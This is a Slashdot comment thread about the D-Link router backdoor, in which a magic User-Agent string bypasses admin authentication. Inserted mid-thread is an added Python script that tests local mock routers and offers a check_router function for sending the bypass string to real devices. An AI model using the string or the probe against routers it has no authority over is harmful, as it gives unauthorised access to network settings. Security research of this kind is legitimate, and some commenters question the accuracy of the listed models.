D-Link Router Backdoor Vulnerability Allows Full Access To Settings
StealthHunter writes "It turned out that just by setting a browser's user-agent to 'xmlset_roodkcableoj28840ybtide' anyone can remotely bypass all authentication on D-Link routers. It seems that thttpd was modified by Alphanetworks, who inserted the backdoor. Unfortunately, vulnerable routers can be easily identified by services like ShodanHQ. At least these models may have vulnerable firmware: DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240."
Re:Thank Goodness... (Score:5, Interesting)
That the consumer is always so proactive with updates that they'll upgrade their router the instant a fix is released.......NOT.
"A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree."
Even if they do, it sounds like they'll be almost four years late.
Backwards: edit by 04882 Joel backdoor (Score:5, Interesting)
And the post points out (in 2010) that if you reverse the string it reads "edit by 04882 Joel Backdoor", so it was clearly a backdoor.
The big scandal here is how can a backdoor be known since 2010 and not revealed??!!!
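The two observations above (the User-Agent string that skips authentication, and the fact that the string reversed spells out "edit by 04882 joel backdoor") can be turned into a small check. The following is an added example, not code from the Slashdot thread, from the original blog post, or from D-Link/Alphanetworks. It stands up two constructed local mock admin pages, one that honours the magic User-Agent and one that does not, and classifies each by comparing a plain request with one carrying the string. The mock's behaviour for ordinary visitors (a 401 with a Basic-auth challenge) is an assumption made here so the example runs offline; the page says nothing about how the real thttpd build answers. Function and class names (`check_router`, `MockRouterHandler`, and so on) are this example's own. Only point `check_router` at devices you are authorised to test.

```python
import http.server
import threading
import urllib.error
import urllib.request

# The User-Agent value quoted in the submission (from the page, not an assumption).
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"


def reverse_backdoor_string(s: str = BACKDOOR_UA) -> str:
    """Reverse the string, as the 2010 forum post did; it reads 'editby04882joelbackdoor_teslmx'."""
    return s[::-1]


class MockRouterHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a router admin page (hypothetical, for this example).

    Anyone presenting BACKDOOR_UA gets the settings page; everyone else gets a
    401 + Basic-auth challenge. The 401 behaviour is this mock's assumption.
    """

    backdoor_enabled = True

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if self.backdoor_enabled and ua == BACKDOOR_UA:
            body = b"<html>router settings (no login asked)</html>"
            self.send_response(200)
        else:
            body = b"Unauthorized"
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class PatchedRouterHandler(MockRouterHandler):
    """Same mock with the special-case removed: the magic UA is treated like any other."""
    backdoor_enabled = False


def start_mock(handler_cls):
    """Serve a mock on an ephemeral localhost port in a daemon thread; returns (server, base_url)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/"


def http_status(url, user_agent=None, timeout=5):
    """GET url and return the HTTP status; with user_agent=None urllib sends its own default UA."""
    headers = {"User-Agent": user_agent} if user_agent else {}
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_router(base_url):
    """Compare a plain request against one carrying the backdoor User-Agent.

    'inconclusive'   : the page is reachable without any login at all, so the
                       UA proves nothing (remote admin left open, or a trusted session)
    'vulnerable'     : a plain request is refused but the magic UA gets a 200
    'not_vulnerable' : the magic UA is refused exactly like everyone else
    """
    baseline = http_status(base_url)
    probe = http_status(base_url, BACKDOOR_UA)
    if baseline == 200:
        return "inconclusive"
    if probe == 200:
        return "vulnerable"
    return "not_vulnerable"


def demo():
    """Run the check against both constructed mocks; returns {mock_name: verdict}."""
    results = {}
    for name, cls in (("backdoored", MockRouterHandler), ("patched", PatchedRouterHandler)):
        server, url = start_mock(cls)
        try:
            results[name] = check_router(url)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    print(reverse_backdoor_string())
    print(demo())
```

The status-code comparison assumes the admin page answers unauthenticated visitors with a 401 challenge. A firmware that instead redirects to an HTML login form will return 200 for both requests (urllib follows the redirect), so against such a device compare the response bodies rather than the codes. The check is read-only: it never logs in or changes a setting, it only observes whether the two requests are treated differently.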
edited by 04882 Joel backdoor (Score:4, Interesting)
Re:Will this stupidity ever end? (Score:5, Interesting)
Sometimes I think that things like this should be felonies, though. Criminal offense or not, in a sensible world this would put alphanetworks out of business.
The home router market is an ongoing disaster (Score:5, Interesting)
There is a systemic, complete and total disregard for the basic tenets of security in nearly the entire home router/CPE market.
Start with crypto - no hwrng and a known "less than ideal" version of /dev/random to feed your "secure" wpa and ssh sessions.
Worse:
There is no privilege separation in most routers, which was OK when they were single-function devices, BUT not OK when vulnerabilities in services like Samba can be used to root most of the top 10 current home routers:
http://securityevaluators.com/content/case-studies/routers/soho_service_hacks.jsp [securityevaluators.com]
Once an attacker p0wns your home gateway they can change your dns to malicious sites, as dnschanger did:
http://www.dcwg.org/ [dcwg.org]
or have it participate in botnets, or inflict further attacks on unsuspecting devices both inside and outside your firewall, or sniff your traffic - there is no security when your front door is left wide open.
What nearly every home router and CPE manufacturer is shipping is **rotware**, running 4-7 year old kernels with known CVEs, and 10 year old versions of critical services like dnsmasq. You'd think that new 802.11ac devices available for this Christmas might have some modern software on them, but just to pick out a recent example, the "new" Netgear Nighthawk router runs Linux 2.6.36.4 and dnsmasq 2.15, according to their R7000 GPL code drop:
http://kb.netgear.com/app/answers/detail/a_id/2649 [netgear.com]
Brand new hardware - 4+ and 10 year old software respectively.
It's unfair of me to pick on Netgear; every router I've looked at this Christmas season has some major issues.
Right now, the only current hope for decent security in home routers is in open, modern, and maintained firmware. And I wish the manufacturers (and ISPs, AND users, and governments) understood that, and there was (in particular) a sustainable model for continuous updates and upgrades as effective as android's in this market. I don't care if it came from taxation, isp fees, or built into the price of the device - would you willingly leave your networks' front door open if you understood the consequences?
Rotten routers with closed source code, and no maintenance, are a huge security risk, and they are holding back the ipv6 transition, (and nearly all current models have bufferbloat, besides)
How can the dysfunctional edge of the Internet be fixed?
Re:Will this stupidity ever end? (Score:4, Interesting)
Who are you going to put in prison, exactly? It's possible only a small team of engineers was aware of this. Hell, it may have even been one rogue developer whom nobody gave permission to put it there.
Re:The home router market is an ongoing disaster (Score:3, Interesting)
"Right now, the only current hope for decent security in home routers is in open, modern, and maintained firmware"
Nah. The only lonely hope fer descentified home security routers is to build sum yerself. It aren't that hard. What hillbilly don't got a beige box layin' about and a spare NIC? Need juz... uh... count 'em: | | <- Dis manny Etherport whatsits to build a maximam security gateway. I tighted two screws (righty tighty, leftie loosie), got dem dere PCI card hooked up. Putted in a CD, wot axed a few questimations, and done.
Oh, but dis is dat dere big brained slashamadoodle folks. Fergiven ma pardon. Ain tryin' ta make yah look dum 'er nuffin. Ya'll cityfolks done figgered dis shit aout. [wikipedia.org]
Juz liek ta bitch an' moan is all, eh?
's like gramppy says: Yah can lead a geek ta a solution, butcha go ta jail if ya drown 'em in it.
Re:A big problem (Score:5, Interesting)
Being able to manipulate the router's config interface would allow an external entity the ability to upload a new firmware to the router. The new firmware would offer the attacker switches to flip at will that would enable packet sniffing of all traffic and man-in-the-middle SSL attacks. Organized crime / NSA (redundant to mention both, I know) seek no deeper capabilities than this.
You bring up a great point about smaller establishments running WiFi on D-Link equipment. Perhaps their SSIDs should be modified to read, "HACKED BY NSA - DO NOT USE!"
Re:Will this stupidity ever end? (Score:4, Interesting)
I also have my own site and I see many things. I know that every day there are people knocking on doors or ports. It is another world that most people only understand as some kind of stuff done by technically afflicted people.
Re:Will this stupidity ever end? (Score:5, Interesting)
The DI-524 is, what, 8 years old? The firmware for it hasn't been updated since 2006. How, then, is it listed as vulnerable?
This is some guy on a blog. It's a mixture of fact and wild speculation. This isn't an official security notification on something like Bugtraq or CERT, etc. He tested the DI-100 firmware, v1.13. The FTP link he provided lists the timestamp for the file as "02/19/2013 11:09AM", not 2006.
He doesn't even have a DI-100; he just downloaded it at random. He thinks, based on "the source code of the HTML pages and some Shodan search results", that the devices listed are affected. There was no actual testing; it's just rampant speculation based on Sir Bloggy McBlog's Google-fu. Now, that said, I have been doing some additional research, and the company Revell is based out of Germany -- which is also where D-Link's software development team is. Revell's website indicates the model went on sale about the same time as the movie release -- May 2013. The timestamp is February. It's not enough to bust my theory that 04882 is a reference to the model... it's just possible the website is wrong, or he got one early from a friend who works at said company. It does happen; maybe they handed them out at special screenings.
Such is the nature of speculating on these things; it's interesting, but it's nearly impossible to get positive verification of a theory.
Re:Idiot pruf (Score:5, Interesting)
I can easily see something like this having the potential to cause losses not dissimilar to your "shuttle crash" scenario. It's "keys to the kingdom" external access to what should be a private network.
Finally, there's no chance in hell of even 1% of these devices receiving a firmware update. Nobody (outside of us) upgrades the firmware on their home router; They run it from factory until death, then buy another one. These devices will be vulnerable for the foreseeable future.
Re:Will this stupidity ever end? (Score:5, Interesting)
It sounds more like the backdoor was put in deliberately, probably to aid support staff who were fed up with trying to explain how to type "192.168.1.1" into the address box instead of Bing. This way they can just find your IP address and then go in via the backdoor to sort out any problems, about 90% of which will be WiFi congestion on the default channel (11).
Re:Why bother? (Score:0, Interesting)
I wouldn't really say forked as much as I would say "given a new lick of paint".
Admittedly they added features on top that completely change the way you can interact with Android, which I prefer massively.
I mean, who DOESN'T want Multi-tasking capabilities? Right now general Android is a toy OS at best, not even kidding (same with all the other crappy phone OSes like it), it is awful, multi-tasking actually makes it useful beyond playing some crap games or browsing Faceboke.
Then there is the S Pen, admittedly the model I have has a weird detection error on the middle left side and somewhere around 25% down on the right side, but those are minor, but god damn, S Pen is so incredibly useful.
Around 65-70% of the reason I even got the Samsung tablet was due to multi-tasking and the S Pen so I could use it as a graphics tablet as well.
I can just sit there with VNC open as well as S Note in dual view working between them easily.
I've even been thinking of writing an S Pen based keyboard, specifically for it because I haven't found a single decent keyboard besides that Hackers Keyboard, everything else is absolute trash for any reasonable use in anything text-heavy that, yet again, isn't stupid Facebook tards posting terrible updates about how they suck at everything. Gotta put smileys in my keyboard for all the fb ppls XD. FUCK.
But yes, I actually dislike the general Android community for lashing against Samsung for trying to actually, you know, MAKE THINGS EASIER AND BETTER.
I hope eventually they get some good code behind the window manager that can force any application into a window and deal with the interaction issues externally, so applications themselves don't need to add any support for it directly. That would be great; then it truly has become just a facelift rather than an attempt to force others into using Samsung-specific interfaces. (Any good developer would only add support for it and not support it solely anyway.)
Re:Idiot pruf (Score:4, Interesting)
I think it is? http://tsd.dlink.com.tw/downloads2008detailgo.asp [dlink.com.tw]
Someone commented on another website with this link: https://gist.github.com/ccpz/6960941 [github.com] which shows the backdoor string being defined in some config.